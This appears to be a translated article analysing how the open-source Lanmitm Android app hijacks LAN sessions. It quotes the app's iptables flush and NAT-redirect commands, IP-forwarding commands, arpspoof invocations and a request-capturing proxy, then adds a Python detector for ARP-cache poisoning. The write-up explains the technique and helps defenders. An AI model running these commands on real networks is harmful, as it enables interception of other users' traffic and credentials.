Android man-in-the-middle attack

Source: Internet
Author: User

0x00

The idea behind an Android man-in-the-middle attack is to hijack the sessions between attacked machines and servers on a local area network. On the surface the attacked machine and the server appear to work normally, but their traffic has actually been hijacked by the man in the middle. The process can be illustrated with a single diagram.


Data sent by the attacked host first passes through the attacker. Data returned by the server also passes through the attacker before it is sent on to the attacked host.


0x01

An open-source Android man-in-the-middle attack sample is available at https://github.com/ssun125/Lanmitm. Here we mainly analyze the principle behind the session hijacking shown in the effect preview at that link.


Analyzing the source code at https://github.com/ssun125/Lanmitm shows that the ARP spoofing attack is implemented in four key steps:

1. NAT packet forwarding using iptables

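    public static final String[] PORT_REDIRECT_CMD = {
        "iptables -t nat -F",                                   // flush the nat table
        "iptables -F",                                          // flush the filter table
        "iptables -t nat -I POSTROUTING -s 0/0 -j MASQUERADE",  // NAT all forwarded traffic
        "iptables -P FORWARD ACCEPT",                           // allow forwarding by default
        // Redirect matching TCP traffic to the local HTTP proxy.
        // The --dport value is not preserved in this page's copy of the command.
        "iptables -t nat -A PREROUTING -j DNAT -p tcp --dport <port> --to "
            + AppContext.getIp() + ":" + HttpProxy.HTTP_PROXY_PORT
    };

These commands are run in the startHttpProxy method of the ProxyService class.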


2. Enable IP forwarding so that the device forwards packets like a router

    private String[] FORWARD_COMMANDS = {
        "echo 1 > /proc/sys/net/ipv4/ip_forward",             // IPv4 forwarding
        "echo 1 > /proc/sys/net/ipv6/conf/all/forwarding"     // IPv6 forwarding
    };

These commands are run in the onStartCommand method of the ArpService class.


3. ARP poisoning

    // First arpspoof instance: aimed at the target host (or at the gateway,
    // when the selected target is the gateway itself).
    if ((ONE_WAY_HOST & arp_cheat_way) != 0) {
        if (target_ip == null)
            target_ip = AppContext.getTarget().getIp();
        if (!target_ip.equals(AppContext.getGateway()))
            arp_spoof_cmd = getFilesDir() + "/arpspoof -i " + interfaceName
                    + " -t " + target_ip + " " + AppContext.getGateway();
        else
            arp_spoof_cmd = getFilesDir() + "/arpspoof -i " + interfaceName
                    + " -t " + AppContext.getGateway() + " " + target_ip;
        arpSpoof = new Thread() {
            @Override
            public void run() {
                ShellUtils.execCommand(arp_spoof_cmd, true, false);
            }
        };
        arpSpoof.start();
    }
    // Second arpspoof instance: aimed at the gateway.
    if ((ONE_WAY_ROUTE & arp_cheat_way) != 0) {
        arp_spoof_recv_cmd = getFilesDir() + "/arpspoof -i " + interfaceName
                + " -t " + AppContext.getGateway() + " " + AppContext.getIp();
        arpSpoofRecv = new Thread() {
            @Override
            public void run() {
                ShellUtils.execCommand(arp_spoof_recv_cmd, true, false);
            }
        };
        arpSpoofRecv.start();
    }

This code is called in the onStartCommand method of the ArpService class.


4. On the attacker's machine, create a socket-based web server, similar in principle to implementing a simple web server with NanoHTTPD.

Through this server the attacker obtains the requests sent by the attacked host and displays them in the interface.

The core code is as follows:

    public class HttpProxy extends Thread {
        // ...
        @Override
        public void run() {
            try {
                // Listen on the device's own address; the iptables DNAT rule
                // from step 1 delivers redirected connections to this port.
                mServerSocket = new ServerSocket();
                mServerSocket.setReuseAddress(true);
                mServerSocket.bind(new InetSocketAddress(
                        AppContext.getInetAddress(), HTTP_PROXY_PORT));
                executor = Executors.newCachedThreadPool();
                while (!stop) {
                    Socket client = mServerSocket.accept();
                    // One handler per accepted connection, chosen by proxy mode.
                    DealThread dealThread = null;
                    switch (mProxyMode) {
                    case MODE_PROXY_SIMPLE:
                        dealThread = new SimpleDealThread(client, mOnRequestListener);
                        break;
                    case MODE_PROXY_DEEP:
                        dealThread = new DeepDealThread(client, mOnRequestListener);
                        break;
                    }
                    executor.execute(dealThread);
                }
            } catch (IOException e) {
                e.printStackTrace();
            } finally {
                if (mServerSocket != null) {
                    try {
                        mServerSocket.close();
                    } catch (IOException e) {
                        e.printStackTrace();
                    }
                }
                if (executor != null) {
                    executor.shutdownNow();
                }
            }
        }
        // ......
    }
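
From the defender's side, the ARP poisoning in step 3 leaves a visible trace in the attacked host's ARP cache: the gateway's IP suddenly maps to a new MAC address, usually one that another LAN IP already uses. The following is an added example, not code from the original page or from the LANMITM project; it checks /proc/net/arp-formatted snapshots for both signs. The function names, addresses and snapshots are constructed for illustration.

```python
from collections import defaultdict

ATF_COM = 0x2  # kernel ARP flag: entry is complete (resolved)

def parse_arp_table(text):
    """Return {ip: mac} for resolved entries in /proc/net/arp-formatted text."""
    entries = {}
    for line in text.strip().splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, flags, mac = fields[0], int(fields[2], 16), fields[3].lower()
        if flags & ATF_COM and mac != "00:00:00:00:00:00":
            entries[ip] = mac
    return entries

def find_poisoning(baseline, current, gateway_ip):
    """Compare a trusted baseline cache with the current one; return findings."""
    findings = []
    old, new = baseline.get(gateway_ip), current.get(gateway_ip)
    if old and new and old != new:
        findings.append(("gateway-mac-changed", gateway_ip, old, new))
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:  # one MAC answering for several IPs
            findings.append(("mac-shared", mac, tuple(sorted(ips))))
    return findings

# Constructed snapshots of an attacked host's ARP cache (not real captures).
BEFORE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         02:00:00:00:00:01     *        wlan0
192.168.1.23     0x1         0x2         02:00:00:00:00:17     *        wlan0
192.168.1.40     0x1         0x0         00:00:00:00:00:00     *        wlan0
"""
DURING = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         02:00:00:00:00:17     *        wlan0
192.168.1.23     0x1         0x2         02:00:00:00:00:17     *        wlan0
192.168.1.40     0x1         0x0         00:00:00:00:00:00     *        wlan0
"""
GATEWAY = "192.168.1.1"

if __name__ == "__main__":
    for finding in find_poisoning(parse_arp_table(BEFORE), parse_arp_table(DURING), GATEWAY):
        print(finding)
```

On a Linux or Android host the same functions can be fed the contents of /proc/net/arp, with the baseline taken on a network state known to be clean.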
